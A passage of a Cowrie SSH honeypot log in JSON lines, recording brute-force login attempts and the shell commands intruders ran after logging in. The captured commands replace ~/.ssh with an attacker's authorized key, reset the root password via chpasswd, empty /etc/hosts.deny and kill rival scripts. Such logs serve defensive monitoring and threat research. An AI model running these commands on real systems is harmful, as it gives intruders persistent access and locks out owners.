&& chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:01:22.581064Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:01:22.852364Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:22.853369Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55666,"dst_ip":"1.2.3.4","dst_port":22,"session":"7469ebe6e3ff","protocol":"ssh","message":"New connection: 212.227.235.229:55666 (1.2.3.4:22) [session: 7469ebe6e3ff]","sensor":"my-vps","timestamp":"2025-08-26T05:01:23.118834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:01:23.119842Z","src_ip":"212.227.235.229","session":"7469ebe6e3ff"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:01:23.387806Z","src_ip":"212.227.235.229","session":"7469ebe6e3ff"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:01:24.502058Z","src_ip":"212.227.235.229","session":"7469ebe6e3ff"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:25.772267Z","src_ip":"212.227.235.229","session":"7469ebe6e3ff"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55670,"dst_ip":"1.2.3.4","dst_port":22,"session":"05e09b9b85e2","protocol":"ssh","message":"New connection: 212.227.235.229:55670 (1.2.3.4:22) [session: 05e09b9b85e2]","sensor":"my-vps","timestamp":"2025-08-26T05:01:26.040328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:01:26.040986Z","src_ip":"212.227.235.229","session":"05e09b9b85e2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:01:26.309207Z","src_ip":"212.227.235.229","session":"05e09b9b85e2"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:01:27.424805Z","src_ip":"212.227.235.229","session":"05e09b9b85e2"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:27.695969Z","src_ip":"212.227.235.229","session":"7f3129313901"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:27.696892Z","src_ip":"212.227.235.229","session":"05e09b9b85e2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:49.867551Z","src_ip":"212.227.235.229","session":"a9cea783cb3a"}
{"eventid":"cowrie.session.closed","duration":180.2875316143036,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:01:49.872717Z","src_ip":"212.227.235.229","session":"a9cea783cb3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41096,"dst_ip":"1.2.3.4","dst_port":22,"session":"d018ac8b4b87","protocol":"ssh","message":"New connection: 212.227.235.229:41096 (1.2.3.4:22) [session: d018ac8b4b87]","sensor":"my-vps","timestamp":"2025-08-26T05:02:04.232003Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:02:04.233035Z","src_ip":"212.227.235.229","session":"d018ac8b4b87"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":38720,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e44f6f2f1f4","protocol":"ssh","message":"New connection: 45.88.8.186:38720 (1.2.3.4:22) [session: 5e44f6f2f1f4]","sensor":"my-vps","timestamp":"2025-08-26T05:02:08.191534Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:02:08.705840Z","src_ip":"45.88.8.186","session":"5e44f6f2f1f4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:02:08.710731Z","src_ip":"45.88.8.186","session":"5e44f6f2f1f4"}
{"eventid":"cowrie.login.success","username":"root","password":"moh@mad","message":"login attempt [root/moh@mad] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:02:11.571656Z","src_ip":"45.88.8.186","session":"5e44f6f2f1f4"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:12.596686Z","src_ip":"45.88.8.186","session":"5e44f6f2f1f4"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":53226,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a0eba1d7c0","protocol":"ssh","message":"New connection: 93.123.109.181:53226 (1.2.3.4:22) [session: e7a0eba1d7c0]","sensor":"my-vps","timestamp":"2025-08-26T05:02:31.247516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T05:02:31.248457Z","src_ip":"93.123.109.181","session":"e7a0eba1d7c0"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T05:02:31.268084Z","src_ip":"93.123.109.181","session":"e7a0eba1d7c0"}
{"eventid":"cowrie.login.failed","username":"solana","password":"SOL","message":"login attempt [solana/SOL] failed","sensor":"my-vps","timestamp":"2025-08-26T05:02:31.328084Z","src_ip":"93.123.109.181","session":"e7a0eba1d7c0"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:32.349931Z","src_ip":"93.123.109.181","session":"e7a0eba1d7c0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60226,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e6e1bf6691e","protocol":"ssh","message":"New connection: 212.227.235.229:60226 (1.2.3.4:22) [session: 6e6e1bf6691e]","sensor":"my-vps","timestamp":"2025-08-26T05:02:33.377248Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:02:33.378374Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:02:33.645784Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.login.success","username":"root","password":"Tx123456.","message":"login attempt [root/Tx123456.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:02:34.757189Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:35.316481Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:02:35.317667Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:02:35.318968Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:35.588259Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:36.231566Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:02:36.232245Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:02:36.502278Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:36.503365Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60236,"dst_ip":"1.2.3.4","dst_port":22,"session":"097b5d8204b8","protocol":"ssh","message":"New connection: 212.227.235.229:60236 (1.2.3.4:22) [session: 097b5d8204b8]","sensor":"my-vps","timestamp":"2025-08-26T05:02:36.770458Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:02:36.771094Z","src_ip":"212.227.235.229","session":"097b5d8204b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:02:37.039824Z","src_ip":"212.227.235.229","session":"097b5d8204b8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:02:38.157638Z","src_ip":"212.227.235.229","session":"097b5d8204b8"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:39.428707Z","src_ip":"212.227.235.229","session":"097b5d8204b8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60246,"dst_ip":"1.2.3.4","dst_port":22,"session":"8fec2ba87b58","protocol":"ssh","message":"New connection: 212.227.235.229:60246 (1.2.3.4:22) [session: 8fec2ba87b58]","sensor":"my-vps","timestamp":"2025-08-26T05:02:39.695676Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:02:39.696516Z","src_ip":"212.227.235.229","session":"8fec2ba87b58"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:41.718047Z","src_ip":"212.227.235.229","session":"2c47b92dd537"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:45.434109Z","src_ip":"212.227.235.229","session":"8fec2ba87b58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:45.765057Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep name | wc -l","sensor":"my-vps","timestamp":"2025-08-26T05:02:45.765786Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:46.036977Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:46.591202Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"echo \"root:ZmauNJihTadr\"|chpasswd|bash","message":"CMD: echo \"root:ZmauNJihTadr\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-08-26T05:02:46.592075Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/39ffd2aa72c35a175c6c28ece89a85434e1ccb1efb00b69d7f1e19830394b6ef","size":21,"shasum":"39ffd2aa72c35a175c6c28ece89a85434e1ccb1efb00b69d7f1e19830394b6ef","duplicate":false,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/39ffd2aa72c35a175c6c28ece89a85434e1ccb1efb00b69d7f1e19830394b6ef after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:46.862123Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:02:47.451104Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-08-26T05:02:47.451812Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-08-26T05:02:47.724628Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:02:47.725480Z","src_ip":"212.227.235.229","session":"6e6e1bf6691e"}
